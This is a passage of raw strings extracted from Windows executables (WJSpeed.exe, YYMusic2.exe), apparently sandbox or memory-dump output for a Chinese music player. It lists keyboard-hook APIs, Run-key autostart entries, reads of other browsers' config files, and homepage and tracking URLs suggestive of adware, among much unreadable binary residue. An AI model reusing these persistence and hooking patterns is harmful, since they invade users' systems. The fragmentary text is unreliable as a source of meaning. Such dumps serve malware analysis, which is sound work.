EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
TIdTCPConnectionl
IdTCPConnection
EIdTCPConnectionError
TIdTCPClient
IdTCPClient
BoundPort
PortU
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError8PG
EIdOSSLLoadingKeyError
Uh.sG
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnHeadersAvailable
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
grfKeyState
TComTargetExecEvent
CmdGroup
nCmdID
nCmdexecopt
hhctrl.ocx
URLMON.DLL
SHDOCLC.DLL
IWebBrowser
IWebBrowserApp
IWebBrowser2
TEWBWindowSetResizable
TEWBWindowSetLeft
TEWBWindowSetTop
TEWBWindowSetWidth
TEWBWindowSetHeight
bstrUrlContext
bstrUrl
OnWindowSetResizable
OnWindowSetLeftP
OnWindowSetTop
OnWindowSetWidth
OnWindowSetHeight
rcmDefault
rcmDebug
DontExecuteScripts
DontExecuteJava
DontExecuteActiveX
DisableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
CheckFontSupportsCodePage
DisableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
lpMsg
PMsg
pguidCmdGroup
TTranslateUrlEvent
pchURLIn
ppchURLOut
CmdID
pszUrl
pszUrlContext
szPassWord
ErrorUrl
OptionKeyPath
OverrideOptionKeyPath
OnTranslateUrl
OnCommandExecD
'%s' is not supported.
WebocPopupManagement
ValidateNavigateUrl
HttpUsernamePasswordDisable
GetUrlDomFilePathUnencoded
XmlHttp
MAPI32.DLL
ftp://
http://
https://
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
.Current
\ieframe.dll
\shdocvw.dll
\StringFileInfo\%0.4x%0.4x\%s
TMsgEvent
TKeyEventEx
Bypass
poPortrait
OnKeyDownx
0.750000
3333333
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
EmbeddedWB http://bsalsa.com/
OnActionExecute(QD
SysConfig.ini
WJHTTP
WJPlay.exe
%d.%d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
0123456789
DSound.dll
Winmm.dll
Data\User2.ini
88888888
00000000
/DM8/DMSet.Xml
DMSet.Xml
http://www.baidu.com
http://update.wuji.com
8888-88-88
PlayerUpdate.exe
0000-00-00
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
?456789:;<=
!"#$%&'()* ,-./0123
%fMR=N
.sO%e
ah.Se.Sm
e{.gS
_%2.EC
W<.vV
AKLRUXZZjjjjjjjjmjjZZXURLK"
%S_dikkggggk
%Uagkk`F9?nA>H^
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
eEWB.IEConst
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
PrintOptions.HTMLHeader.Strings
PrintOptions.Orientation
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeStart
Request.ContentType
Request.Accept
Request.BasicAuthentication
Request.UserAgent
7Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
shell32.dll
GetKeyboardState
SetViewportOrgEx
EnumWindows
advapi32.dll
iphlpapi.dll
EnumThreadWindows
gdi32.dll
 %s6)/
%Se=\aO
U^.Ak
rÜc
.NIHrA
).hv^
:.nCX
!.iU 
wf.Xd
.CD|f
user32.dll
RegDeleteKeyA
RegEnumKeyExA
DeleteUrlCacheEntry
UnhookWindowsHookEx
.esVhr
6.Sz}
version.dll
InternetOpenUrlA
MapVirtualKeyA
GetKeyboardLayoutList
.JdMw
GetKeyState
The ordinal %u could not be located in the dynamic link library %s
GetKeyNameTextA
RegOpenKeyExA
GetWindowsDirectoryA
SetWindowsHookExA
RegCreateKeyExA
N|.xe
c&#%sW
0.TYh?
rzQ.hq
.NlNm
xN%Fp7
}1u.UTpY}9
.CoJX=
u.WZqh
,V^.jp
.vpsD
)@3%s
0\.YNm
n.GZw
%cx$Q
R%c)n
SHFileOperationA
GetKeyboardType
GetCPInfo
RegQueryInfoKeyA
RegFlushKey
ShellExecuteA
A-i}1
ActivateKeyboardLayout
wininet.dll
LoadKeyboardLayoutA
The procedure entry point %s could not be located in the dynamic link library %s
GetKeyboardLayout
RegCloseKey
MsgWaitForMultipleObjects
errorUrl
1.0.0.0
JPEG error #%d
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application."%d: Circular links are not allowed
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
No help keyword specified.
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

WJSpeed.exe_2788_rwx_00564000_00001000:

.CD|f

WJSpeed.exe_2788_rwx_00567000_00001000:

user32.dll
RegDeleteKeyA
RegEnumKeyExA

WJSpeed.exe_2788_rwx_0057C000_00002000:

RegOpenKeyExA
ole32.dll
GetWindowsDirectoryA

YYMusic2.exe_3844:

.text
`.rdata
@.data
.rsrc
@.reloc
PSShT
t.HuZ
xSSSh
FTPjKS
FtPj;S
C.PjRV
GetProcessWindowStation
portuguese-brazilian
operator
windows936
windows932
windows874
windows1257
windows1256
windows1255
windows1254
windows1253
windows1252
windows1251
windows1250
Invalid or unsupported charset:
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
AutoRunTipFrame.xml
FrmColor.xml
\SysConfig.ini
FrmConfig.xml
Data\dh.ini
ShowHideWindowKey
ExitWindowKey
tab_hotkey
Software\Microsoft\Windows\CurrentVersion\Run
BoxNews.exe
"%s%s" -mini
"%s" -mini
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s\%s
favorfm.xml
channels.xml
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/ptree_implementation.hpp
D:\zhuyicheng\boost_1_53_0\boost/property_tree/xml_parser.hpp
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_read_rapidxml.hpp
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_write.hpp
D:\zhuyicheng\boost_1_53_0\boost/property_tree/string_path.hpp
FrmFeedBack.xml
http://tongji.yinyue.fm/feedback/b.html
Data/setup.ini
FrmHotKeyTip.xml
HotKeyTipFrame
hotkey
d:d:d
FrmLrcChild.xml
FrmLrc.xml
Source Files\LrcFrame.cpp
BtnLogin
YYMusic2.exe
http://www.hao123.com/?tn=98868055_hao_pg
http://update.yinyue.fm/goUrl.html?
Skin.rs
Skin\mainframeshadow.png
http://update.yinyue.fm/tj.ashx
Skin\progresstooltip.png
__HotKeyTipWindow
__HotKeyTipClass
Skin\hotkeytipbk.png
adb.exe
aapt.exe
apnews.exe
FrmPlayer.xml
60,8,100,118
60,24,100,134
Source Files\MainFrame.cpp
file='suspensiontopa.png'
file='suspensiontop.png'
file='suspensiontopahover.png'
file='btn-play.png' source='0,0,64,64'
file='btn-play.png' source='0,64,64,128'
file='btn-play.png' source='0,128,64,192'
file='lyrictoplay.png'
pl_play.png
file='btn-pause.png' source='0,0,64,64'
file='btn-pause.png' source='0,64,64,128'
file='btn-pause.png' source='0,128,64,192'
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,40,35,59'
pl_pause.png
file='loading0%d.png'
-d:d:d
-d:d
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,40,35,59'
file='bk.png'
lyriclikea2.png
lyriclike.png
lyriclikea.png
MessageBox.xml
Source Files\MusicPlayer.cpp
http://update.yinyue.fm/
<4,$?7/'
(3-!0,1'8"5.*2$
Data\server.ini
Data\Version.ini
appupdate/ver.txt
PlayerUpdate.exe
FrmPlayList.xml
FrmPopWnd.xml
WebBrowserEx
http://update.yinyue.fm/url.txt
FrmProgressToolTip.xml
%d:d
http://tongji.yinyue.fm/
a.ashx
00:00:00:00:00:00
%d-%d-%d %d:%d:%d
icon/ccjs.ico
icon/ie.ico
Internet Explorer YyfmPlay.lnk
icon\gouwu.ico
http://update.yinyue.fm//dh.txt
icon\ccjs.ico
icon\ie.ico
X:X:X:X:X:X
//./%s
Data/version.ini
2000-01-01
2000-01-01 00:00:00
Data/client.ini
Data/dh.ini
Software\Microsoft\Windows NT\CurrentVersion
Data/user2.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TheWorld.exe
\TheWorld.ini
\Baidu\browser\config.ini
\SogouExplorer\config.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Maxthon2
SharedAccount\Config\Config.ini
SetTipFrame.xml
FrmSetWindowLrcFrame.xml
Source Files\SetWindowLrcFrame.cpp
FrmSystemMenuFrame.xml
event_edit_keydown_eshowhide
event_edit_keydown_eexit
file='list_play.png' dest='6,6,24,24'
file='list_pause.png' dest='6,6,24,24'
2-0-0|1-0-0
1-0-0|1-0-0
3-0-0|1-0-0
4-0-0|1-0-0
5-0-0|1-0-0
6-0-0|1-0-0
list_item.xml
operation
frmWindowLrc.xml
frmWindowLrcParent.xml
http://www.9ku.com/lrc2/
http://www.9ku.com/fm/
http://img.9ku.com
http://mp3.9ku.com
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/json_parser_read.hpp
http://player.kuwo.cn/webmusic/st/getMuiseDate?flag=3&r=&pd=
http://fm.baidu.com/dev/api/?tn=playlist&id=
http://music.baidu.com/data/music/fmlink?type=mp3&rate=320&songIds=
http://fm.baidu.com
http://pan.baidu.com
http://live.hkuradio.com/radio2?download=1
http://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_yy.png
http://live.hkuradio.com/radio1?download=1
http://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_zh.png
http://live.3gv.ifeng.com/live/zhongwen?fmt=mp3_32k_mp3
http://imgs.diantai.ifeng.com/images/channelimg/ifeng_zwt_new.png
http://live.3gv.ifeng.com/live/zixun?fmt=mp3_32k_mp3
http://imgs.diantai.ifeng.com/images/channelimg/ifeng_zxt_new.png
http://live.3gv.ifeng.com/live/hongkong?fmt=mp3_32k_mp3
http://imgs.diantai.ifeng.com/images/channelimg/ifeng_xgt_new.png
http://moblive.rbc.cn/fm876.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_wy_new.png
http://moblive.rbc.cn/fm1039.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgjt_new.png
http://moblive.rbc.cn/fm1006.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_xw_new.png
http://moblive.rbc.cn/am603.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bggs_new.png
http://moblive.rbc.cn/fm1025.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgty_new.png
http://moblive.rbc.cn/am774.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgwy_new.png
http://moblive.rbc.cn/am927.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgaj_new.png
http://moblive.rbc.cn/fm1073.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgcsfw_new.png
http://www.xiami.com/radio/play/type/6/oid/0
libfm::fm_douban_impl::login
http://www.douban.com/j/app/login
&password=
http://www.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&user_id=
http://www.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&type=
http://shopcgi.qqmusic.qq.com/fcgi-bin/shopsearch.fcg?out=json&value=
"msg":
_0.jpg
http://imgcache.qq.com/music/photo/album/
http://music.qq.com/miniportal/static/lyric/
libfm::fm_impl::get_song_url
WinExec
KERNEL32.dll
GetAsyncKeyState
RegisterHotKey
UnregisterHotKey
USER32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
avcore.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
SHLWAPI.dll
gdiplus.dll
?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z
?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z
?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z
?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z
?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z
?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z
?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z
?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z
?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z
?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z
?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ
?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ
?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z
?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z
?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z
?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z
?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z
?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z
?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z
?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z
?Release@CWebBrowserUI@DuiLib@@UAGKXZ
?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ
?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z
?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ
??1CWebBrowserUI@DuiLib@@UAE@XZ
??0CWebBrowserUI@DuiLib@@QAE@XZ
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z
DuiLib.dll
PSAPI.DLL
IPHLPAPI.DLL
NETAPI32.dll
GetCPInfo
GetProcessHeap
zcÁ
.?AVCWebBrowserUI@DuiLib@@
.?AVCHotKeyTipFrameWnd@@
.?AVCWebBrowserUIEx@@
.?AVWebBrowserEventSinker@@
.?AU?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$alternative@V?$action@V?$chset@D@classic@spirit@boost@@Ua_escape@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@V?$action@U?$uint_parser@K$0BA@$03$03@classic@spirit@boost@@Ua_unicode@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$abstract_parser@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$alternative@V?$action@U?$difference@U?$difference@Uanychar_parser@classic@spirit@boost@@V?$strlit@PBD@234@@classic@spirit@boost@@V?$strlit@PBD@234@@classic@spirit@boost@@Ua_char@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$positive@U?$contiguous@U?$confix_parser@U?$chlit@D@classic@spirit@boost@@U?$kleene_star@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@U1234@Uunary_parser_category@234@Unon_nested@234@Unon_lexeme@234@@classic@spirit@boost@@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$sequence@U?$optional@U?$chlit@D@classic@spirit@boost@@@classic@spirit@boost@@U?$alternative@U?$chlit@D@classic@spirit@boost@@U?$sequence@U?$range@D@classic@spirit@boost@@U?$kleene_star@Udigit_parser@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$sequence@V?$chset@D@classic@spirit@boost@@U?$optional@V?$chset@D@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_